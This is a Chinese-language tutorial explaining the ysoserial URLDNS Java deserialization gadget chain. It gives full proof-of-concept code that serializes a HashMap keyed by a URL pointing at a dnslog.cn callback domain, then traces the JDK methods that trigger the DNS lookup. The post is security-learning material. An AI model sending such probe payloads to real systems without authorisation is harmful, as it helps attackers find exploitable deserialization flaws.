本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。
URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任何不需要第三方依赖,也没有JDK版本的限制。
但是URLDNS利用链也只能用于发起DNS查询请求,也不能做其他事情,因此URLDNS链更多的是用于POC检测。
有了前面的基础,这里直接上URLDNS链的代码(URLDNS链环境为jdk1.8版本):
package com.urldns; import java.io.*; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class URLDNSTest { public static void main(String[] args) throws Exception { HashMap<URL, String> hashMap = new HashMap<URL, String>(); // 设置dns查询url URL url = new URL("http://5aaub7.dnslog.cn"); // 在put前修改url的hashcode为非-1的值,put后将hashcode修改为-1 Field field = Class.forName("java.net.URL").getDeclaredField("hashCode"); field.setAccessible(true); //修改url的hashCode字段的值,再put到hashmap中 field.set(url, 111); hashMap.put(url, "xxxx"); //将url的hashCode修改为-1 field.set(url, -1); ByteArrayOutputStream barr = new ByteArrayOutputStream(); //序列化 ObjectOutputStream oos = new ObjectOutputStream(barr); oos.writeObject(hashMap); oos.close(); //反序列化,触发漏洞 ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); Object o = (Object) ois.readObject(); } }
执行程序后,URLDNS链会发送一次DNS查询的请求操作,这样我们就可以通过DNSLog平台的回显的信息来判断目标是否存在反序列化漏洞
URLDNS链的入口是hashMap的readObject方法
private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException { //省略部分代码...... for (int i = 0; i < mappings; i++) { @SuppressWarnings("unchecked") K key = (K) s.readObject(); @SuppressWarnings("unchecked") V value = (V) s.readObject(); //还原对象 putVal(hash(key), key, value, false, false); } } }
hashMap调用readObject方法在反序列化时会先计算key的hash值,然后再调用putVal方法把键值对放入到hashMap中,还原对象。
hash方法内部会调用key的hashCode方法,这里的key值其实是URLDNS链中构造的url对象
static final int hash(Object key) { int h; //调用key的hashCode方法 return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16); }
key.hashCode操作实际上是调用了url对象的hashCode,判断url对象的hashCode值是否为-1,如果hashCode属性的值不为-1,说明hashCode其实已经有值了,那么会直接返回哈希值。
public synchronized int hashCode() { if (hashCode != -1) return hashCode; //调用hashCode方法触发DNS查询请求 hashCode = handler.hashCode(this); return hashCode; }
在构造URLDNS链的时候,我们通过反射将hashCode成员属性的值改回了-1
field.set(url, -1);
因此这里会继续往下执行,调用handler的hashCode方法(实际上是调用了URLStreamHandler类的hashCode方法)。
URLStreamHandler类的hashCode方法内部调用了一个getHostAddress方法获取url地址,这一步会触发DNS查询请求
protected int hashCode(URL u) { int h = 0; //获取url协议 String protocol = u.getProtocol(); if (protocol != null) h += protocol.hashCode(); //获取url地址 InetAddress addr = getHostAddress(u); if (addr != null) { h += addr.hashCode(); } else { String host = u.getHost(); if (host != null) h += host.toLowerCase().hashCode(); } // Generate the file part. String file = u.getFile(); if (file != null) h += file.hashCode(); // Generate the port part. if (u.getPort() == -1) h += getDefaultPort(); else h += u.getPort(); // Generate the ref part. String ref = u.getRef(); if (ref != null) h += ref.hashCode(); return h; }
我们继续跟进getHostAddress方法,可以看到内部调用了一个getByName方法,这个方法会根据url地址返回一个ip地址,也就是说getByName方法会发送一个DNS查询请求。
其实前面构造URLDNS链时,将url对象的hashCode属性的值改回-1的目的是为了调用InetAddress.getByName方法。
URLDNS利用链的调用过程如下
参考资料:
https://xz.aliyun.com/t/9417